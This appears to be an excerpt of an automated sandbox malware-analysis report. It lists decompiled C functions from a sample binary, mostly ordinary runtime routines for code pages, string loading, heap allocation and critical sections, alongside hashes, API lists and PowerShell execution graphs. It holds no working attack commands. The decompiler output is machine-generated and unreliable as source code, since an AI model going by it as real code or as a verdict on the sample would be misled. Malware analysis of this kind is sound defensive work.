                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID: > @$KA
                                          • API String ID: 3519838083-301980584
                                          • Opcode ID: f9624756dcd051103a0faf5414ab264e1043146aad46313972ce47ae36e47b30
                                          • Instruction ID: 0797aa4f2666763f951e0621ef07ec53320c6840b80f95fc9e8c0876c74f2843
                                          • Opcode Fuzzy Hash: f9624756dcd051103a0faf5414ab264e1043146aad46313972ce47ae36e47b30
                                          • Instruction Fuzzy Hash: 27517D30D0020A9ACF15EF95C855AEEBF7AAF5430AF10452FE452372D2DB795B06CB89
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041808D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 124COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 92%
                                          			E0041808D(void* __ebx, void* __edi) {
				char _v17;
				signed char _v18;
				struct _cpinfo _v24;
				char _v280;
				char _v536;
				char _v792;
				char _v1304;
				void* _t43;
				char _t44;
				signed char _t45;
				void* _t55;
				signed int _t56;
				signed char _t64;
				intOrPtr* _t66;
				signed int _t68;
				signed int _t70;
				signed int _t71;
				signed char _t76;
				signed char _t77;
				signed char* _t78;
				void* _t81;
				void* _t87;
				void* _t88;

				if(GetCPInfo( *0x4256c8,  &_v24) == 1) {
					_t44 = 0;
					do {
						 *((char*)(_t87 + _t44 - 0x114)) = _t44;
						_t44 = _t44 + 1;
					} while (_t44 < 0x100);
					_t45 = _v18;
					_v280 = 0x20;
					if(_t45 == 0) {
						L9:
						E00418A6C(1,  &_v280, 0x100,  &_v1304,  *0x4256c8,  *0x4258e4, 0);
						E0041881D( *0x4258e4, 0x100,  &_v280, 0x100,  &_v536, 0x100,  *0x4256c8, 0);
						E0041881D( *0x4258e4, 0x200,  &_v280, 0x100,  &_v792, 0x100,  *0x4256c8, 0);
						_t55 = 0;
						_t66 =  &_v1304;
						do {
							_t76 =  *_t66;
							if((_t76 & 0x00000001) == 0) {
								if((_t76 & 0x00000002) == 0) {
									 *(_t55 + 0x4256e0) =  *(_t55 + 0x4256e0) & 0x00000000;
									goto L16;
								}
								 *(_t55 + 0x4257e1) =  *(_t55 + 0x4257e1) | 0x00000020;
								_t77 =  *((intOrPtr*)(_t87 + _t55 - 0x314));
								L12:
								 *(_t55 + 0x4256e0) = _t77;
								goto L16;
							}
							 *(_t55 + 0x4257e1) =  *(_t55 + 0x4257e1) | 0x00000010;
							_t77 =  *((intOrPtr*)(_t87 + _t55 - 0x214));
							goto L12;
							L16:
							_t55 = _t55 + 1;
							_t66 = _t66 + 2;
						} while (_t55 < 0x100);
						return _t55;
					}
					_t78 =  &_v17;
					do {
						_t68 =  *_t78 & 0x000000ff;
						_t56 = _t45 & 0x000000ff;
						if(_t56 <= _t68) {
							_t81 = _t87 + _t56 - 0x114;
							_t70 = _t68 - _t56 + 1;
							_t71 = _t70 >> 2;
							memset(_t81 + _t71, memset(_t81, 0x20202020, _t71 << 2), (_t70 & 0x00000003) << 0);
							_t88 = _t88 + 0x18;
						}
						_t78 =  &(_t78[2]);
						_t45 =  *((intOrPtr*)(_t78 - 1));
					} while (_t45 != 0);
					goto L9;
				}
				_t43 = 0;
				do {
					if(_t43 < 0x41 || _t43 > 0x5a) {
						if(_t43 < 0x61 || _t43 > 0x7a) {
							 *(_t43 + 0x4256e0) =  *(_t43 + 0x4256e0) & 0x00000000;
						} else {
							 *(_t43 + 0x4257e1) =  *(_t43 + 0x4257e1) | 0x00000020;
							_t64 = _t43 - 0x20;
							goto L22;
						}
					} else {
						 *(_t43 + 0x4257e1) =  *(_t43 + 0x4257e1) | 0x00000010;
						_t64 = _t43 + 0x20;
						L22:
						 *(_t43 + 0x4256e0) = _t64;
					}
					_t43 = _t43 + 1;
				} while (_t43 < 0x100);
				return _t43;
			}


























                                          0x004180aa
                                          0x004180b0
                                          0x004180b7
                                          0x004180b7
                                          0x004180be
                                          0x004180bf
                                          0x004180c3
                                          0x004180c6
                                          0x004180cf
                                          0x00418108
                                          0x00418127
                                          0x0041814b
                                          0x00418173
                                          0x0041817b
                                          0x0041817d
                                          0x00418183
                                          0x00418183
                                          0x00418189
                                          0x004181a4
                                          0x004181b6
                                          0x00000000
                                          0x004181b6
                                          0x004181a6
                                          0x004181ad
                                          0x00418199
                                          0x00418199
                                          0x00000000
                                          0x00418199
                                          0x0041818b
                                          0x00418192
                                          0x00000000
                                          0x004181bd
                                          0x004181bd
                                          0x004181bf
                                          0x004181c0
                                          0x00000000
                                          0x00418183
                                          0x004180d3
                                          0x004180d6
                                          0x004180d6
                                          0x004180d9
                                          0x004180de
                                          0x004180e2
                                          0x004180e9
                                          0x004180f1
                                          0x004180fb
                                          0x004180fb
                                          0x004180fb
                                          0x004180fe
                                          0x004180ff
                                          0x00418102
                                          0x00000000
                                          0x00418107
                                          0x004181c6
                                          0x004181cd
                                          0x004181d0
                                          0x004181ee
                                          0x00418203
                                          0x004181f5
                                          0x004181f5
                                          0x004181fe
                                          0x00000000
                                          0x004181fe
                                          0x004181d7
                                          0x004181d7
                                          0x004181e0
                                          0x004181e3
                                          0x004181e3
                                          0x004181e3
                                          0x0041820a
                                          0x0041820b
                                          0x00418211

                                          APIs
                                          • GetCPInfo.KERNEL32(?,00000000), ref: 004180A1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: Info
                                          • String ID: $
                                          • API String ID: 1807457897-3032137957
                                          • Opcode ID: 8b363f32da595bfb59a3e5cf7fceda2159d83bff833a4ab1ae99a185f1cff2df
                                          • Instruction ID: d0f9309d8466ab513fef0fe96190925d4c3a9a36aebfd3e00fd14af349a29a6b
                                          • Opcode Fuzzy Hash: 8b363f32da595bfb59a3e5cf7fceda2159d83bff833a4ab1ae99a185f1cff2df
                                          • Instruction Fuzzy Hash: 18417C322046586EEB22DB14CC4DFFB7FA8DB06700F9400EAD549C7162CA794985CBAA
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00405F5E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 81%
                                          			E00405F5E(intOrPtr __ecx, struct HINSTANCE__* __edx, void* __esi) {
				signed int _t38;
				WCHAR* _t54;
				WCHAR* _t58;
				int _t61;
				void* _t63;
				intOrPtr _t68;

				E00413954(E00419764, _t63);
				_t68 =  *0x423148; // 0x1
				 *(_t63 - 0x14) = __edx;
				 *((intOrPtr*)(_t63 - 0x10)) = __ecx;
				 *((intOrPtr*)(_t63 - 0x18)) = 0;
				if(_t68 == 0) {
					_push( *(_t63 + 8));
					E00405EBC(_t63 - 0x30, __edx);
					 *((intOrPtr*)(_t63 - 4)) = 1;
					E00401A03();
					_push( *((intOrPtr*)(_t63 - 0x30)));
				} else {
					 *(_t63 - 0x24) = 0;
					 *(_t63 - 0x20) = 0;
					 *((intOrPtr*)(_t63 - 0x1c)) = 0;
					E00402170(_t63 - 0x24, 3);
					 *((intOrPtr*)(_t63 - 4)) = 0;
					_t61 = 0x100;
					do {
						_t61 = _t61 + 0x100;
						_t9 = _t61 - 1; // -1
						_t36 = _t9;
						if(_t9 >=  *((intOrPtr*)(_t63 - 0x1c))) {
							E00402170(_t63 - 0x24, _t36);
						}
						_t14 = _t63 - 0x14; // 0x414be4
					} while (_t61 - LoadStringW( *_t14,  *(_t63 + 8),  *(_t63 - 0x24), _t61) <= 1);
					_t54 =  *(_t63 - 0x24);
					_t38 = 0;
					if( *_t54 != 0) {
						_t58 = _t54;
						do {
							_t38 = _t38 + 1;
							_t58 =  &(_t58[1]);
						} while ( *_t58 != 0);
					}
					_t54[_t38] = 0;
					 *(_t63 - 0x20) = _t38;
					E00401CE1( *((intOrPtr*)(_t63 - 0x10)), _t63 - 0x24);
					_push( *(_t63 - 0x24));
				}
				E00403A9C();
				 *[fs:0x0] =  *((intOrPtr*)(_t63 - 0xc));
				return  *((intOrPtr*)(_t63 - 0x10));
			}









                                          0x00405f63
                                          0x00405f6e
                                          0x00405f74
                                          0x00405f77
                                          0x00405f7a
                                          0x00405f7d
                                          0x00405ff8
                                          0x00405ffe
                                          0x00406008
                                          0x0040600f
                                          0x00406014
                                          0x00405f7f
                                          0x00405f85
                                          0x00405f88
                                          0x00405f8b
                                          0x00405f8e
                                          0x00405f93
                                          0x00405f96
                                          0x00405f9b
                                          0x00405f9b
                                          0x00405fa1
                                          0x00405fa1
                                          0x00405fa7
                                          0x00405fad
                                          0x00405fad
                                          0x00405fb9
                                          0x00405fc6
                                          0x00405fcb
                                          0x00405fce
                                          0x00405fd4
                                          0x00405fd6
                                          0x00405fd8
                                          0x00405fd8
                                          0x00405fda
                                          0x00405fdb
                                          0x00405fd8
                                          0x00405fe0
                                          0x00405fe7
                                          0x00405fee
                                          0x00405ff3
                                          0x00405ff3
                                          0x00406017
                                          0x00406024
                                          0x0040602c

                                          APIs
                                          • __EH_prolog.LIBCMT ref: 00405F63
                                          • LoadStringW.USER32(KA,?,?,00000000), ref: 00405FBC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: H_prologLoadString
                                          • String ID: KA
                                          • API String ID: 385046869-4133974868
                                          • Opcode ID: e6db0625694eca8672df4367e77b25990e3c0bbb9f4bdb8bdb41469bebcffd79
                                          • Instruction ID: f8b33de4bb70f64bdff40eb498b0250b344fd9cf2a6d880d3b442eae3703c9f6
                                          • Opcode Fuzzy Hash: e6db0625694eca8672df4367e77b25990e3c0bbb9f4bdb8bdb41469bebcffd79
                                          • Instruction Fuzzy Hash: B8212771D0011A9BCB05EFA1C9919EEBBB5FF08308F10407AE106B6291DB794E40CB98
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00405EBC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00405EBC(intOrPtr __ecx, struct HINSTANCE__* __edx) {
				intOrPtr _t29;
				CHAR* _t43;
				int _t49;
				void* _t51;

				E00413954(E00419748, _t51);
				 *((intOrPtr*)(_t51 - 0x10)) = __ecx;
				 *(_t51 - 0x14) = __edx;
				 *((intOrPtr*)(_t51 - 0x18)) = 0;
				 *(_t51 - 0x24) = 0;
				 *((intOrPtr*)(_t51 - 0x20)) = 0;
				 *((intOrPtr*)(_t51 - 0x1c)) = 0;
				E0040243E(_t51 - 0x24, 3);
				 *((intOrPtr*)(_t51 - 4)) = 0;
				_t49 = 0x100;
				do {
					_t49 = _t49 + 0x100;
					_t9 = _t49 - 1; // -1
					_t27 = _t9;
					if(_t9 >=  *((intOrPtr*)(_t51 - 0x1c))) {
						E0040243E(_t51 - 0x24, _t27);
					}
					_t14 = _t51 - 0x14; // 0x414be4
				} while (_t49 - LoadStringA( *_t14,  *(_t51 + 8),  *(_t51 - 0x24), _t49) <= 1);
				_t43 =  *(_t51 - 0x24);
				_t29 = 0;
				if( *_t43 != 0) {
					do {
						_t29 = _t29 + 1;
					} while ( *((intOrPtr*)(_t29 + _t43)) != 0);
				}
				 *((char*)(_t29 + _t43)) = 0;
				 *((intOrPtr*)(_t51 - 0x20)) = _t29;
				E00403D24( *((intOrPtr*)(_t51 - 0x10)), _t51 - 0x24);
				E00403A9C( *(_t51 - 0x24));
				 *[fs:0x0] =  *((intOrPtr*)(_t51 - 0xc));
				return  *((intOrPtr*)(_t51 - 0x10));
			}







                                          0x00405ec1
                                          0x00405eca
                                          0x00405ed0
                                          0x00405ed8
                                          0x00405edb
                                          0x00405ede
                                          0x00405ee1
                                          0x00405ee4
                                          0x00405ee9
                                          0x00405eec
                                          0x00405ef1
                                          0x00405ef1
                                          0x00405ef7
                                          0x00405ef7
                                          0x00405efd
                                          0x00405f03
                                          0x00405f03
                                          0x00405f0f
                                          0x00405f1c
                                          0x00405f21
                                          0x00405f24
                                          0x00405f28
                                          0x00405f2a
                                          0x00405f2a
                                          0x00405f2b
                                          0x00405f2a
                                          0x00405f30
                                          0x00405f36
                                          0x00405f3d
                                          0x00405f45
                                          0x00405f53
                                          0x00405f5b

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: H_prologLoadString
                                          • String ID: KA
                                          • API String ID: 385046869-4133974868
                                          • Opcode ID: 65d677eaf710bde40107d5e97ee8b2feebca7ae19d827cde6303db2279eeba92
                                          • Instruction ID: 682fdee239e6c4724d42c8af7adc4720fc3e2d38c4520a7b7ac2604701000241
                                          • Opcode Fuzzy Hash: 65d677eaf710bde40107d5e97ee8b2feebca7ae19d827cde6303db2279eeba92
                                          • Instruction Fuzzy Hash: 6C1126B1D011199ACB06EFA5C9959EEBBB4FF18304F50447EE445B3291DB7A5E00CBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004160FA Relevance: 5.1, APIs: 4, Instructions: 53memoryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E004160FA() {
				signed int _t15;
				void* _t17;
				void* _t19;
				void* _t25;
				signed int _t26;
				void* _t27;
				intOrPtr* _t29;

				_t15 =  *0x425a28; // 0x0
				_t26 =  *0x425a18; // 0x0
				if(_t15 != _t26) {
					L3:
					_t27 =  *0x425a2c; // 0x0
					_t29 = _t27 + (_t15 + _t15 * 4) * 4;
					_t17 = HeapAlloc( *0x425a34, 8, 0x41c4);
					 *(_t29 + 0x10) = _t17;
					if(_t17 == 0) {
						L6:
						return 0;
					}
					_t19 = VirtualAlloc(0, 0x100000, 0x2000, 4);
					 *(_t29 + 0xc) = _t19;
					if(_t19 != 0) {
						 *(_t29 + 8) =  *(_t29 + 8) | 0xffffffff;
						 *_t29 = 0;
						 *((intOrPtr*)(_t29 + 4)) = 0;
						 *0x425a28 =  *0x425a28 + 1;
						 *( *(_t29 + 0x10)) =  *( *(_t29 + 0x10)) | 0xffffffff;
						return _t29;
					}
					HeapFree( *0x425a34, 0,  *(_t29 + 0x10));
					goto L6;
				}
				_t2 = _t26 * 4; // 0x50
				_t25 = HeapReAlloc( *0x425a34, 0,  *0x425a2c, _t26 + _t2 + 0x50 << 2);
				if(_t25 == 0) {
					goto L6;
				}
				 *0x425a18 =  *0x425a18 + 0x10;
				 *0x425a2c = _t25;
				_t15 =  *0x425a28; // 0x0
				goto L3;
			}










                                          0x004160fa
                                          0x004160ff
                                          0x0041610b
                                          0x0041613d
                                          0x0041613d
                                          0x00416153
                                          0x00416156
                                          0x0041615e
                                          0x00416161
                                          0x0041618d
                                          0x00000000
                                          0x0041618d
                                          0x00416170
                                          0x00416178
                                          0x0041617b
                                          0x00416191
                                          0x00416195
                                          0x00416197
                                          0x0041619a
                                          0x004161a3
                                          0x00000000
                                          0x004161a6
                                          0x00416187
                                          0x00000000
                                          0x00416187
                                          0x0041610d
                                          0x00416122
                                          0x0041612a
                                          0x00000000
                                          0x00000000
                                          0x0041612c
                                          0x00416133
                                          0x00416138
                                          0x00000000

                                          APIs
                                          • HeapReAlloc.KERNEL32(00000000,00000050,00000000,00000000,00415EC2,00000000,00000000,00000000,00413EF1,00000000,00000000,?,00000000,00000000,00000000), ref: 00416122
                                          • HeapAlloc.KERNEL32(00000008,000041C4,00000000,00000000,00415EC2,00000000,00000000,00000000,00413EF1,00000000,00000000,?,00000000,00000000,00000000), ref: 00416156
                                          • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004), ref: 00416170
                                          • HeapFree.KERNEL32(00000000,?), ref: 00416187
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: AllocHeap$FreeVirtual
                                          • String ID:
                                          • API String ID: 3499195154-0
                                          • Opcode ID: b9288557613d4b1507cb107ac5399481b8ee784b68c3247b56fc213fdecf1f33
                                          • Instruction ID: c92a38fae87bb937ac208a7a453d8678043178d73965b4d0b203d58dccefea2c
                                          • Opcode Fuzzy Hash: b9288557613d4b1507cb107ac5399481b8ee784b68c3247b56fc213fdecf1f33
                                          • Instruction Fuzzy Hash: 98112B31300B01BFC7318F29EC869567BB5FB49764791862AF151C65B0C7709842CF48
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004156E1 Relevance: 5.0, APIs: 4, Instructions: 12COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E004156E1(void* __eax) {
				void* _t1;

				_t1 = __eax;
				InitializeCriticalSection( *0x42078c);
				InitializeCriticalSection( *0x42077c);
				InitializeCriticalSection( *0x42076c);
				InitializeCriticalSection( *0x42074c);
				return _t1;
			}




                                          0x004156e1
                                          0x004156ee
                                          0x004156f6
                                          0x004156fe
                                          0x00415706
                                          0x00415709

                                          APIs
                                          • InitializeCriticalSection.KERNEL32(?,004154C2,?,00414B74), ref: 004156EE
                                          • InitializeCriticalSection.KERNEL32(?,004154C2,?,00414B74), ref: 004156F6
                                          • InitializeCriticalSection.KERNEL32(?,004154C2,?,00414B74), ref: 004156FE
                                          • InitializeCriticalSection.KERNEL32(?,004154C2,?,00414B74), ref: 00415706
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: CriticalInitializeSection
                                          • String ID:
                                          • API String ID: 32694325-0
                                          • Opcode ID: 9da826fcb73db9b2f0886f92194b085cad0f2cdeae026ac3c84f39be76329a94
                                          • Instruction ID: 9a5a21d657ffcc76f5c3c67f011d6e28d8344b300781f1748fbef07cd2b7b2eb
                                          • Opcode Fuzzy Hash: 9da826fcb73db9b2f0886f92194b085cad0f2cdeae026ac3c84f39be76329a94
                                          • Instruction Fuzzy Hash: CCC00231A05138ABCB712B65FC048563FB5EB882A03558077A1045203186612C12EFD8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Executed Functions

                                          Function 00007FFBAD3D1355 Relevance: .0, Instructions: 49COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.417146485.00007FFBAD3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD3D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_7ffbad3d0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7d136ae24190021218f010f465a32cb6dcd2b253f9b7f790df5ba213fb598ef4
                                          • Instruction ID: b150de9753e37189d2d7271707c55ef80b92bd0e6902882702c0f619bd1e5774
                                          • Opcode Fuzzy Hash: 7d136ae24190021218f010f465a32cb6dcd2b253f9b7f790df5ba213fb598ef4
                                          • Instruction Fuzzy Hash: F501677111CB0C8FD744EF0CE451AA6B7E0FB99324F10056DE58AC3651DA36E882CB45
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Execution Graph

                                          Execution Coverage:12.1%
                                          Dynamic/Decrypted Code Coverage:0%
                                          Signature Coverage:0%
                                          Total number of Nodes:42
                                          Total number of Limit Nodes:2
                                          execution_graph 37724 2e42188 37725 2e4219a 37724->37725 37729 2e44270 37725->37729 37734 2e44260 37725->37734 37726 2e421c9 37731 2e4427a 37729->37731 37730 2e4429f 37730->37726 37731->37730 37739 2e44328 37731->37739 37744 2e44319 37731->37744 37735 2e44270 37734->37735 37736 2e4429f 37735->37736 37737 2e44328 GetFileAttributesW 37735->37737 37738 2e44319 GetFileAttributesW 37735->37738 37736->37726 37737->37736 37738->37736 37740 2e4433b 37739->37740 37749 2e443a0 37740->37749 37755 2e44390 37740->37755 37741 2e44359 37741->37730 37745 2e44359 37744->37745 37746 2e44322 37744->37746 37745->37730 37747 2e443a0 GetFileAttributesW 37746->37747 37748 2e44390 GetFileAttributesW 37746->37748 37747->37745 37748->37745 37750 2e443b5 37749->37750 37752 2e444bb 37750->37752 37761 2e450d1 37750->37761 37751 2e4447a 37751->37752 37753 2e450d1 GetFileAttributesW 37751->37753 37752->37741 37753->37752 37756 2e443a0 37755->37756 37758 2e444bb 37756->37758 37760 2e450d1 GetFileAttributesW 37756->37760 37757 2e4447a 37757->37758 37759 2e450d1 GetFileAttributesW 37757->37759 37758->37741 37759->37758 37760->37757 37767 2e450d1 GetFileAttributesW 37761->37767 37768 2e45130 37761->37768 37762 2e450fa 37763 2e45100 37762->37763 37773 2e43fec 37762->37773 37763->37751 37767->37762 37769 2e45148 37768->37769 37770 2e4515d 37769->37770 37771 2e43fec GetFileAttributesW 37769->37771 37770->37762 37772 2e4518e 37771->37772 37772->37762 37774 2e45658 GetFileAttributesW 37773->37774 37776 2e4518e 37774->37776 37776->37751

                                          Executed Functions

                                          Function 06279078 Relevance: .7, Instructions: 698COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457549041.0000000006270000.00000040.00000800.00020000.00000000.sdmp, Offset: 06270000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6270000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 969eb92d4bf19aaf83dd677a4de0de470fd734a7f6cfaf552103bf951e7c9b2a
                                          • Instruction ID: 1a354e493672c97fe9e78bc15a25d38d7fe18aeb3f08dfb86a1fc56c692e86c8
                                          • Opcode Fuzzy Hash: 969eb92d4bf19aaf83dd677a4de0de470fd734a7f6cfaf552103bf951e7c9b2a
                                          • Instruction Fuzzy Hash: BA525A34A1020ADFDB55DF64C890BAA77B2BF89304F1485A9D909AB390DB35ED85CF90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06269720 Relevance: .5, Instructions: 479COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5bfd7cbb41026f2860f719e187441a55a4d98e6b321e4456e83cb401387440f3
                                          • Instruction ID: 309cf90f96b390b9ce5cfe32e8d28360a5cde5bfb056c095bc894ad9afe23d8a
                                          • Opcode Fuzzy Hash: 5bfd7cbb41026f2860f719e187441a55a4d98e6b321e4456e83cb401387440f3
                                          • Instruction Fuzzy Hash: 4502BE34E1030A9FDB14DF66C454AAEBBB2EF84304F148969E8059B794DB75E8C6CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06263418 Relevance: 7.7, Strings: 6, Instructions: 221COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1683 6263418-6263498 1689 626349f-62634d9 1683->1689 1690 626349a 1683->1690 1695 62634f5-62634fc 1689->1695 1696 62634db-62634ee 1689->1696 1690->1689 1697 62634fe-6263501 1695->1697 1698 6263508-626350e 1695->1698 1696->1695 1697->1698 1741 6263511 call 6263a00 1698->1741 1742 6263511 call 6263a10 1698->1742 1700 6263517-626353c 1703 6263545-6263576 1700->1703 1704 626353e 1700->1704 1708 626357f-626364d 1703->1708 1709 6263578 1703->1709 1704->1703 1724 6263672-6263687 1708->1724 1725 626364f-6263655 1708->1725 1709->1708 1735 626368e 1724->1735 1726 62637ea-62637f4 1725->1726 1727 626365b-626366b 1725->1727 1728 62637f6-6263805 1726->1728 1729 626380d-6263814 1726->1729 1734 626366d 1727->1734 1728->1729 1732 6263816-6263830 1729->1732 1733 6263838-6263853 1729->1733 1732->1733 1738 6263855 1733->1738 1739 626385d 1733->1739 1734->1726 1735->1726 1738->1739 1740 626385e 1739->1740 1740->1740 1741->1700 1742->1700
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Hr0k$Hr0k$Hr0k$Hr0k$Hr0k$Hr0k
                                          • API String ID: 0-2721006579
                                          • Opcode ID: 3a4865eb6a7d289d818ed155c7ad3e632369b12eb507520495279a07e0810861
                                          • Instruction ID: de2c0bebd6edc54aba27d95f947317c3a7e0102ebdd80a1bc6cd9c9afd5a2600
                                          • Opcode Fuzzy Hash: 3a4865eb6a7d289d818ed155c7ad3e632369b12eb507520495279a07e0810861
                                          • Instruction Fuzzy Hash: A4916034A102099FD744DF69C490AAEBBF2EF89314F04C968E8199B751CB75ED86CF90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06263409 Relevance: 7.7, Strings: 6, Instructions: 219COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
